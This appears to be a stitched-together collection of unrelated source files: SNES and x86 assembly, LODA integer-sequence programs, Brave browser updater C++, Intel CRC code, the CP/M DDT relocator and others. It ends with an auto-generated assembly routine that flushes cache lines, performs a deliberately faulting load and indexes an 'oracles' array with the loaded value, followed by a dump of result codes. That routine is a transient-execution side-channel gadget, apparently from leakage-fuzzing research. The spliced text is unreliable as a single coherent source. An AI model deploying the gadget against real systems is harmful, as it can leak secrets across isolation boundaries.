;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'error' sound to be played
;
sound_effect_error:
pushall
A8
lda #$10 ; Error
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'write' sound to be played
;
sound_effect_write:
pushall
A8
lda #$11
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'erase' sound to be played
;
sound_effect_erase:
pushall
A8
lda #$12
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'click' sound to be played
;
sound_effect_menuselect:
sound_effect_click:
pushall
A8
lda #$13
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'back' sound to be played
;
sound_effect_back:
pushall
A8
lda #$14
jsr sound_sendCommand
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Request the 'solved' sound to be played
;
sound_effect_solved:
pushall
A8
lda #$15
jsr sound_sendCommand
popall
rts
.ends
.bank 5
.section "apu program" FREE
apu_payload: .incbin "sound/sndcode.bin"
apu_dummy: .db 0 ; for sizeof
.ends
|
; A033280: Number of diagonal dissections of a convex (n+8)-gon into n+1 regions.
; Submitted by Jamie Morken(s4)
; 1,27,385,4004,34398,259896,1790712,11511720,70114902,409003595,2303105805,12593413560,67173369900,350777861280,1798432526880,9073909567440,45140379405030,221768094898350,1077403874372826,5182007298602904,24699073588138180,116759256962107760
mov $1,7
add $1,$0
mov $2,$0
add $2,$1
sub $1,2
bin $1,4
bin $2,$0
mul $1,$2
mov $0,$1
div $0,5
|
/// @copyright
/// Copyright (C) 2020 Assured Information Security, Inc.
///
/// @copyright
/// Permission is hereby granted, free of charge, to any person obtaining a copy
/// of this software and associated documentation files (the "Software"), to deal
/// in the Software without restriction, including without limitation the rights
/// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
/// copies of the Software, and to permit persons to whom the Software is
/// furnished to do so, subject to the following conditions:
///
/// @copyright
/// The above copyright notice and this permission notice shall be included in
/// all copies or substantial portions of the Software.
///
/// @copyright
/// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
/// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
/// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
/// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
/// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
/// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
/// SOFTWARE.
#include <bsl/string_view.hpp>
#include <bsl/debug.hpp>
namespace bsl
{
/// <!-- description -->
/// @brief Provides the example's main function
///
inline void
example_contiguous_iterator_gt_equals() noexcept
{
bsl::string_view const str{"Hello"};
bsl::string_view::iterator_type const iter1{str.begin()};
bsl::string_view::iterator_type const iter2{str.begin()};
bsl::string_view::iterator_type const iter3{str.end()};
if (iter1 == iter2) {
bsl::print() << "success\n";
}
if (iter1 != iter3) {
bsl::print() << "success\n";
}
if (iter1 < iter3) {
bsl::print() << "success\n";
}
if (iter1 <= iter2) {
bsl::print() << "success\n";
}
if (iter3 > iter1) {
bsl::print() << "success\n";
}
if (iter3 >= iter1) {
bsl::print() << "success\n";
}
}
}
|
; A159287: Expansion of x^2/(1-x^2-2*x^3)
; Submitted by Jamie Morken(s4)
; 0,0,1,0,1,2,1,4,5,6,13,16,25,42,57,92,141,206,325,488,737,1138,1713,2612,3989,6038,9213,14016,21289,32442,49321,75020,114205,173662,264245,402072,611569,930562,1415713,2153700,3276837,4985126,7584237,11538800,17554489,26707274,40632089,61816252,94046637,143080430,217679141,331173704,503840001,766531986,1166187409,1774211988,2699251381,4106586806,6247675357,9505089568,14460848969,22000440282,33471028105,50922138220,77471908669,117864194430,179316185109,272808011768,415044573969,631440381986
mov $1,1
lpb $0
sub $0,1
sub $2,$1
add $3,$1
add $1,$2
sub $1,$3
mul $1,2
add $2,$3
lpe
mov $0,$2
|
BITS 64
global getFeatureInfo
getFeatureInfo:
mov r10,rbx
mov eax, 0x01
cpuid
mov [rdi], dword ecx
mov [rdi+4], dword edx
mov [rdi+8], dword eax
mov [rdi+12], dword ebx
mov rbx, r10
ret
|
; -------------------------------------------------------------
; nasm -f elf64 -o 00_arithmetics_if.o 00_arithmetics_if.asm
; ld -o 00_arithmetics_if 00_arithmetics_if.o
; ./00_arithmetics_if
; -------------------------------------------------------------
section .data
; define constants
num1: equ 100
num2: equ 50
; initialize message
myMessage: db "Correct"
section .text
global _start
_start:
; copy num1's value to rax (temporary register)
mov rax, num1
; copy num2's value to rbx
mov rbx, num2
; put rax + rbx into rax
add rax, rbx
; compare rax and 150
cmp rax, 150
; go to .exit label if rax and 150 are not equal
jne .exit
; go to .correctSum label if rax and 150 are equal
jmp .correctSum
; Print message that sum is correct
.correctSum:
; write syscall
mov rax, 1
; file descritor, standard output
mov rdi, 1
; message address
mov rsi, myMessage
; length of message
mov rdx, 15
; call write syscall
syscall
; exit from program
jmp .exit
; exit procedure
.exit:
; exit syscall
mov rax, 60
; exit code
mov rdi, 0
; call exit syscall
syscall
|
// Copyright 2016 Brave Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "brave/browser/component_updater/brave_component_updater_configurator.h"
#include <stdint.h>
#include <string>
#include <vector>
#include "base/command_line.h"
#include "base/strings/sys_string_conversions.h"
#include "base/version.h"
#if defined(OS_WIN)
#include "base/win/win_util.h"
#endif
#include "chrome/browser/browser_process.h"
#include "components/component_updater/configurator_impl.h"
#include "components/prefs/pref_service.h"
#include "components/update_client/component_patcher_operation.h"
#include "net/url_request/url_request_context_getter.h"
namespace component_updater {
namespace {
class BraveConfigurator : public update_client::Configurator {
public:
BraveConfigurator(const base::CommandLine* cmdline,
net::URLRequestContextGetter* url_request_getter,
bool use_brave_server);
// update_client::Configurator overrides.
int InitialDelay() const override;
int NextCheckDelay() const override;
int OnDemandDelay() const override;
int UpdateDelay() const override;
std::vector<GURL> UpdateUrl() const override;
std::vector<GURL> PingUrl() const override;
std::string GetProdId() const override;
base::Version GetBrowserVersion() const override;
std::string GetChannel() const override;
std::string GetBrand() const override;
std::string GetLang() const override;
std::string GetOSLongName() const override;
std::string ExtraRequestParams() const override;
std::string GetDownloadPreference() const override;
net::URLRequestContextGetter* RequestContext() const override;
scoped_refptr<update_client::OutOfProcessPatcher> CreateOutOfProcessPatcher()
const override;
bool EnabledDeltas() const override;
bool EnabledComponentUpdates() const override;
bool EnabledBackgroundDownloader() const override;
bool EnabledCupSigning() const override;
PrefService* GetPrefService() const override;
update_client::ActivityDataService* GetActivityDataService() const override;
bool IsPerUserInstall() const override;
std::vector<uint8_t> GetRunActionKeyHash() const override;
private:
friend class base::RefCountedThreadSafe<BraveConfigurator>;
ConfiguratorImpl configurator_impl_;
bool use_brave_server_;
~BraveConfigurator() override {}
};
// Allows the component updater to use non-encrypted communication with the
// update backend. The security of the update checks is enforced using
// a custom message signing protocol and it does not depend on using HTTPS.
BraveConfigurator::BraveConfigurator(
const base::CommandLine* cmdline,
net::URLRequestContextGetter* url_request_getter,
bool use_brave_server)
: configurator_impl_(cmdline, url_request_getter, false),
use_brave_server_(use_brave_server) {}
int BraveConfigurator::InitialDelay() const {
return configurator_impl_.InitialDelay();
}
int BraveConfigurator::NextCheckDelay() const {
return configurator_impl_.NextCheckDelay();
}
int BraveConfigurator::OnDemandDelay() const {
return configurator_impl_.OnDemandDelay();
}
int BraveConfigurator::UpdateDelay() const {
return configurator_impl_.UpdateDelay();
}
std::vector<GURL> BraveConfigurator::UpdateUrl() const {
if (use_brave_server_) {
// For localhost of vault-updater
// return std::vector<GURL> {GURL("http://localhost:8192/extensions")};
return std::vector<GURL>
{GURL("https://laptop-updates.brave.com/extensions")};
}
// For Chrome's component store
return configurator_impl_.UpdateUrl();
}
std::vector<GURL> BraveConfigurator::PingUrl() const {
return UpdateUrl();
}
std::string BraveConfigurator::GetProdId() const {
return std::string();
}
base::Version BraveConfigurator::GetBrowserVersion() const {
return configurator_impl_.GetBrowserVersion();
}
std::string BraveConfigurator::GetChannel() const {
return std::string("stable");
}
std::string BraveConfigurator::GetBrand() const {
return std::string();
}
std::string BraveConfigurator::GetLang() const {
return std::string();
}
std::string BraveConfigurator::GetOSLongName() const {
return configurator_impl_.GetOSLongName();
}
std::string BraveConfigurator::ExtraRequestParams() const {
return configurator_impl_.ExtraRequestParams();
}
std::string BraveConfigurator::GetDownloadPreference() const {
return std::string();
}
net::URLRequestContextGetter* BraveConfigurator::RequestContext() const {
return configurator_impl_.RequestContext();
}
scoped_refptr<update_client::OutOfProcessPatcher>
BraveConfigurator::CreateOutOfProcessPatcher() const {
return nullptr;
}
bool BraveConfigurator::EnabledComponentUpdates() const {
return configurator_impl_.EnabledComponentUpdates();
}
bool BraveConfigurator::EnabledDeltas() const {
// TODO(bbondy): Re-enable
// return configurator_impl_.DeltasEnabled();
return false;
}
bool BraveConfigurator::EnabledBackgroundDownloader() const {
return configurator_impl_.EnabledBackgroundDownloader();
}
bool BraveConfigurator::EnabledCupSigning() const {
if (use_brave_server_) {
return false;
}
return configurator_impl_.EnabledCupSigning();
}
PrefService* BraveConfigurator::GetPrefService() const {
return nullptr;
}
update_client::ActivityDataService* BraveConfigurator::GetActivityDataService()
const {
return nullptr;
}
bool BraveConfigurator::IsPerUserInstall() const {
return false;
}
std::vector<uint8_t> BraveConfigurator::GetRunActionKeyHash() const {
return configurator_impl_.GetRunActionKeyHash();
}
} // namespace
scoped_refptr<update_client::Configurator>
MakeBraveComponentUpdaterConfigurator(
const base::CommandLine* cmdline,
net::URLRequestContextGetter* context_getter,
bool use_brave_server) {
return new BraveConfigurator(cmdline, context_getter, use_brave_server);
}
} // namespace component_updater
|
;;
;; Copyright (c) 2019-2021, Intel Corporation
;;
;; Redistribution and use in source and binary forms, with or without
;; modification, are permitted provided that the following conditions are met:
;;
;; * Redistributions of source code must retain the above copyright notice,
;; this list of conditions and the following disclaimer.
;; * Redistributions in binary form must reproduce the above copyright
;; notice, this list of conditions and the following disclaimer in the
;; documentation and/or other materials provided with the distribution.
;; * Neither the name of Intel Corporation nor the names of its contributors
;; may be used to endorse or promote products derived from this software
;; without specific prior written permission.
;;
;; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
;; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
;; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
;; DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
;; FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
;; DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
;; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
;; CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
;; OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
;; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;;
%include "include/os.asm"
%include "include/reg_sizes.asm"
%include "include/crc32_refl_const.inc"
%include "include/clear_regs.asm"
%include "include/cet.inc"
%include "include/error.inc"
[bits 64]
default rel
%ifndef ETHERNET_FCS_FN
%define ETHERNET_FCS_FN ethernet_fcs_sse
%endif
%ifndef ETHERNET_FCS_FN_LOCAL
%define ETHERNET_FCS_FN_LOCAL ethernet_fcs_sse_local
%endif
%ifndef CRC32_REFL_FN
%define CRC32_REFL_FN crc32_refl_by8_sse
%endif
%ifdef LINUX
%define arg1 rdi
%define arg2 rsi
%define arg3 rdx
%define arg4 rcx
%else
%define arg1 rcx
%define arg2 rdx
%define arg3 r8
%define arg4 r9
%endif
struc STACK_FRAME
_gpr_save: resq 1
_rsp_save: resq 1
_xmm_save: resq 8 * 2
endstruc
mksection .text
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; arg1 - buffer pointer
;; arg2 - buffer size in bytes
;; Returns CRC value through RAX
align 32
MKGLOBAL(ETHERNET_FCS_FN, function,)
ETHERNET_FCS_FN:
endbranch64
%ifdef SAFE_PARAM
;; Reset imb_errno
IMB_ERR_CHECK_RESET
;; Check len == 0
or arg2, arg2
jz end_param_check
;; Check in == NULL (invalid if len != 0)
or arg1, arg1
jz wrong_param
end_param_check:
%endif
mov rax, rsp
sub rsp, STACK_FRAME_size
and rsp, -16
mov [rsp + _rsp_save], rax
%ifndef LINUX
movdqa [rsp + _xmm_save + 16*0], xmm6
movdqa [rsp + _xmm_save + 16*1], xmm7
movdqa [rsp + _xmm_save + 16*2], xmm8
movdqa [rsp + _xmm_save + 16*3], xmm9
movdqa [rsp + _xmm_save + 16*4], xmm10
movdqa [rsp + _xmm_save + 16*5], xmm11
movdqa [rsp + _xmm_save + 16*6], xmm12
movdqa [rsp + _xmm_save + 16*7], xmm13
%endif
lea arg4, [rel crc32_ethernet_fcs_const]
mov arg3, arg2
mov arg2, arg1
xor DWORD(arg1), DWORD(arg1)
call CRC32_REFL_FN
%ifndef LINUX
movdqa xmm6, [rsp + _xmm_save + 16*0]
movdqa xmm7, [rsp + _xmm_save + 16*1]
movdqa xmm8, [rsp + _xmm_save + 16*2]
movdqa xmm9, [rsp + _xmm_save + 16*3]
movdqa xmm10, [rsp + _xmm_save + 16*4]
movdqa xmm11, [rsp + _xmm_save + 16*5]
movdqa xmm12, [rsp + _xmm_save + 16*6]
movdqa xmm13, [rsp + _xmm_save + 16*7]
%endif
%ifdef SAFE_DATA
clear_scratch_xmms_sse_asm
%endif
mov rsp, [rsp + _rsp_save]
ret
%ifdef SAFE_PARAM
wrong_param:
;; Clear reg and imb_errno
IMB_ERR_CHECK_START rax
;; Check in != NULL
IMB_ERR_CHECK_NULL arg1, rax, IMB_ERR_NULL_SRC
;; Set imb_errno
IMB_ERR_CHECK_END rax
ret
%endif
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; arg1 - buffer pointer
;; arg2 - buffer size in bytes
;; arg3 - place to store computed CRC value (can be NULL)
;; Returns CRC value through RAX
align 32
MKGLOBAL(ETHERNET_FCS_FN_LOCAL, function,internal)
ETHERNET_FCS_FN_LOCAL:
mov rax, rsp
sub rsp, STACK_FRAME_size
and rsp, -16
mov [rsp + _rsp_save], rax
mov [rsp + _gpr_save], arg3
lea arg4, [rel crc32_ethernet_fcs_const]
mov arg3, arg2
mov arg2, arg1
xor DWORD(arg1), DWORD(arg1)
call CRC32_REFL_FN
mov arg3, [rsp + _gpr_save]
or arg3, arg3
je .local_fn_exit
mov [arg3], eax
.local_fn_exit:
mov rsp, [rsp + _rsp_save]
ret
mksection stack-noexec
|
; A111572: a(n) = a(n-1) + a(n-3) + a(n-4), n >= 4.
; Submitted by Jon Maiga
; -1,3,2,1,3,8,11,15,26,45,71,112,183,299,482,777,1259,2040,3299,5335,8634,13973,22607,36576,59183,95763,154946,250705,405651,656360,1062011,1718367,2780378,4498749,7279127,11777872,19056999,30834875,49891874,80726745
mov $1,1
mov $2,3
mov $4,-1
lpb $0
sub $0,1
sub $3,$4
mov $4,$2
mov $2,$3
add $2,$1
mov $1,$3
add $5,$4
mov $3,$5
lpe
mov $0,$4
|
#include "Precomp.h"
#include "Shader.h"
#include <Core/File.h>
Shader::Shader()
: myType(IShader::Type::Invalid)
{
}
Shader::Shader(Resource::Id anId, const std::string& aPath)
: Resource(anId, aPath)
, myType(IShader::Type::Invalid)
{
if (aPath.length() > 4)
{
myType = DetermineType(aPath);
}
}
void Shader::OnLoad(const File& aFile)
{
// TODO: add a similar to .ppl file that contains paths to correct
// shader files (GLSL/SPIR-V)
// TODO: this does a copy - add a move from function to File
// with safety-use asserts, or figure out alternative approach
myFileContents = aFile.GetBuffer();
}
IShader::Type Shader::DetermineType(const std::string& aPath)
{
const std::string ext = aPath.substr(aPath.length() - 4);
if (ext == "vert")
{
return IShader::Type::Vertex;
}
else if (ext == "frag")
{
return IShader::Type::Fragment;
}
else if (ext == "tctr")
{
return IShader::Type::TessControl;
}
else if (ext == "tevl")
{
return IShader::Type::TessEval;
}
else if (ext == "geom")
{
return IShader::Type::Geometry;
}
else
{
ASSERT_STR(false, "Type not supported!");
return IShader::Type::Invalid;
}
} |
; A200039: Number of -n..n arrays x(0..2) of 3 elements with sum zero and with zeroth through 2nd differences all nonzero.
; 0,2,14,28,52,78,114,152,200,250,310,372,444,518,602,688,784,882,990,1100,1220,1342,1474,1608,1752,1898,2054,2212,2380,2550,2730,2912,3104,3298,3502,3708,3924,4142,4370,4600,4840,5082,5334,5588,5852,6118,6394
mov $4,$0
add $0,3
pow $4,2
add $0,$4
mov $3,-20
sub $3,$0
div $4,2
mul $4,2
mov $2,$4
mul $2,2
mov $1,$2
mul $1,2
mul $3,2
sub $1,$3
sub $1,43
div $1,4
mul $1,2
|
#include <QNetworkAccessManager>
#include <QNetworkRequest>
#include <QNetworkReply>
#include <QDebug>
#include "AuthFlow.h"
#include <Application.h>
AuthFlow::AuthFlow(AccountData * data, QObject *parent) :
AccountTask(data, parent)
{
}
void AuthFlow::succeed() {
m_data->validity_ = AccountValidity::Valid;
changeState(
AccountTaskState::STATE_SUCCEEDED,
tr("Finished all authentication steps")
);
}
void AuthFlow::executeTask() {
if(m_currentStep) {
return;
}
changeState(AccountTaskState::STATE_WORKING, tr("Initializing"));
nextStep();
}
void AuthFlow::nextStep() {
if(m_steps.size() == 0) {
// we got to the end without an incident... assume this is all.
m_currentStep.reset();
succeed();
return;
}
m_currentStep = m_steps.front();
qDebug() << "AuthFlow:" << m_currentStep->describe();
m_steps.pop_front();
connect(m_currentStep.get(), &AuthStep::finished, this, &AuthFlow::stepFinished);
connect(m_currentStep.get(), &AuthStep::showVerificationUriAndCode, this, &AuthFlow::showVerificationUriAndCode);
connect(m_currentStep.get(), &AuthStep::hideVerificationUriAndCode, this, &AuthFlow::hideVerificationUriAndCode);
m_currentStep->perform();
}
QString AuthFlow::getStateMessage() const {
switch (m_taskState)
{
case AccountTaskState::STATE_WORKING: {
if(m_currentStep) {
return m_currentStep->describe();
}
else {
return tr("Working...");
}
}
default: {
return AccountTask::getStateMessage();
}
}
}
void AuthFlow::stepFinished(AccountTaskState resultingState, QString message) {
if(changeState(resultingState, message)) {
nextStep();
}
}
|
; A051437: Number of undirected walks of length n+1 on an oriented triangle, visiting n+2 vertices, with n "corners"; the symmetry group is C3. Walks are not self-avoiding.
; 1,3,4,10,16,36,64,136,256,528,1024,2080,4096,8256,16384,32896,65536,131328,262144,524800,1048576,2098176,4194304,8390656,16777216,33558528,67108864,134225920,268435456,536887296,1073741824,2147516416,4294967296,8590000128,17179869184,34359869440,68719476736,137439215616,274877906944,549756338176,1099511627776,2199024304128,4398046511104,8796095119360,17592186044416,35184376283136,70368744177664,140737496743936,281474976710656,562949970198528,1125899906842624,2251799847239680,4503599627370496
mov $2,$0
mov $4,2
lpb $4
mov $0,$2
sub $4,1
add $0,$4
max $0,0
seq $0,56309 ; Number of reversible strings with n beads using exactly two different colors.
mov $3,$0
mov $5,$4
mul $5,$0
add $1,$5
lpe
min $2,1
mul $2,$3
sub $1,$2
mov $0,$1
|
; DDT RELOCATOR PROGRAM, INCLUDED WITH THE MODULE TO PERFORM
; THE MOVE FROM 200H TO THE DESTINATION ADDRESS
VERSION EQU 14 ;1.4
;
; COPYRIGHT (C) 1976, 1977, 1978
; DIGITAL RESEARCH
; BOX 579 PACIFIC GROVE
; CALIFORNIA 93950
;
ORG 100H
STACK EQU 200H
BDOS EQU 0005H
PRNT EQU 9 ;BDOS PRINT FUNCTION
MODULE EQU 200H ;MODULE ADDRESS
;
LXI B,0 ;ADDRESS FIELD FILLED-IN WHEN MODULE BUILT
JMP START
DB 'COPYRIGHT (C) 1978, DIGITAL RESEARCH '
SIGNON: DB 'DDT VERS '
DB VERSION/10+'0','.'
DB VERSION MOD 10 + '0','$'
START: LXI SP,STACK
PUSH B
PUSH B
LXI D,SIGNON
MVI C,PRNT
CALL BDOS
POP B ;RECOVER LENGTH OF MOVE
LXI H,BDOS+2;ADDRESS FIELD OF JUMP TO BDOS (TOP MEMORY)
MOV A,M ;A HAS HIGH ORDER ADDRESS OF MEMORY TOP
DCR A ;PAGE DIRECTLY BELOW BDOS
SUB B ;A HAS HIGH ORDER ADDRESS OF RELOC AREA
MOV D,A
MVI E,0 ;D,E ADDRESSES BASE OF RELOC AREA
PUSH D ;SAVE FOR RELOCATION BELOW
;
LXI H,MODULE;READY FOR THE MOVE
MOVE: MOV A,B ;BC=0?
ORA C
JZ RELOC
DCX B ;COUNT MODULE SIZE DOWN TO ZERO
MOV A,M ;GET NEXT ABSOLUTE LOCATION
STAX D ;PLACE IT INTO THE RELOC AREA
INX D
INX H
JMP MOVE
;
RELOC: ;STORAGE MOVED, READY FOR RELOCATION
; HL ADDRESSES BEGINNING OF THE BIT MAP FOR RELOCATION
POP D ;RECALL BASE OF RELOCATION AREA
POP B ;RECALL MODULE LENGTH
PUSH H ;SAVE BIT MAP BASE IN STACK
MOV H,D ;RELOCATION BIAS IS IN D
;
REL0: MOV A,B ;BC=0?
ORA C
JZ ENDREL
;
; NOT END OF THE RELOCATION, MAY BE INTO NEXT BYTE OF BIT MAP
DCX B ;COUNT LENGTH DOWN
MOV A,E
ANI 111B ;0 CAUSES FETCH OF NEXT BYTE
JNZ REL1
; FETCH BIT MAP FROM STACKED ADDRESS
XTHL
MOV A,M ;NEXT 8 BITS OF MAP
INX H
XTHL ;BASE ADDRESS GOES BACK TO STACK
MOV L,A ;L HOLDS THE MAP AS WE PROCESS 8 LOCATIONS
REL1: MOV A,L
RAL ;CY SET TO 1 IF RELOCATION NECESSARY
MOV L,A ;BACK TO L FOR NEXT TIME AROUND
JNC REL2 ;SKIP RELOCATION IF CY=0
;
; CURRENT ADDRESS REQUIRES RELOCATION
LDAX D
ADD H ;APPLY BIAS IN H
STAX D
REL2: INX D ;TO NEXT ADDRESS
JMP REL0 ;FOR ANOTHER BYTE TO RELOCATE
;
ENDREL: ;END OF RELOCATION
POP D ;CLEAR STACKED ADDRESS
MVI L,0
PCHL ;GO TO RELOCATED PROGRAM
END
|
.global s_prepare_buffers
s_prepare_buffers:
push %r14
push %r15
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x1a9c6, %r14
nop
nop
inc %rax
movl $0x61626364, (%r14)
cmp %rdx, %rdx
lea addresses_normal_ht+0x1b77e, %r15
nop
nop
xor $18023, %rdx
mov (%r15), %cx
nop
nop
lfence
lea addresses_A_ht+0x95c6, %r14
nop
nop
nop
nop
inc %r9
movl $0x61626364, (%r14)
nop
nop
nop
nop
dec %r14
lea addresses_A_ht+0xe30e, %rsi
lea addresses_D_ht+0x10006, %rdi
nop
and $45980, %r15
mov $48, %rcx
rep movsb
nop
nop
nop
and %rdx, %rdx
lea addresses_UC_ht+0x1c33e, %rcx
nop
nop
nop
nop
add $14526, %rax
movb $0x61, (%rcx)
nop
nop
xor $8585, %rax
lea addresses_A_ht+0x1b5e6, %rsi
lea addresses_A_ht+0x67c6, %rdi
nop
nop
nop
nop
nop
sub %r9, %r9
mov $83, %rcx
rep movsb
nop
xor $64616, %rax
lea addresses_A_ht+0x14216, %r14
clflush (%r14)
cmp %r9, %r9
mov $0x6162636465666768, %rdi
movq %rdi, (%r14)
nop
nop
nop
nop
nop
and %r9, %r9
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r9
pop %r15
pop %r14
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %rax
push %rbp
push %rbx
push %rdi
push %rsi
// Store
lea addresses_A+0xdd86, %rsi
add $27436, %rdi
mov $0x5152535455565758, %rbp
movq %rbp, %xmm3
movups %xmm3, (%rsi)
nop
nop
nop
nop
nop
inc %rax
// Faulty Load
mov $0x7af38900000007c6, %r13
clflush (%r13)
nop
nop
nop
nop
cmp %rbp, %rbp
mov (%r13), %rbx
lea oracles, %rbp
and $0xff, %rbx
shlq $12, %rbx
mov (%rbp,%rbx,1), %rbx
pop %rsi
pop %rdi
pop %rbx
pop %rbp
pop %rax
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_NC', 'AVXalign': False, 'congruent': 0, 'size': 8, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'AVXalign': False, 'congruent': 5, 'size': 16, 'same': False, 'NT': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_NC', 'AVXalign': False, 'congruent': 0, 'size': 8, 'same': True, 'NT': False}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'congruent': 8, 'size': 4, 'same': False, 'NT': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'AVXalign': True, 'congruent': 3, 'size': 2, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 9, 'size': 4, 'same': True, 'NT': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'AVXalign': False, 'congruent': 3, 'size': 1, 'same': True, 'NT': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 5, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 11, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'AVXalign': True, 'congruent': 4, 'size': 8, 'same': False, 'NT': False}}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 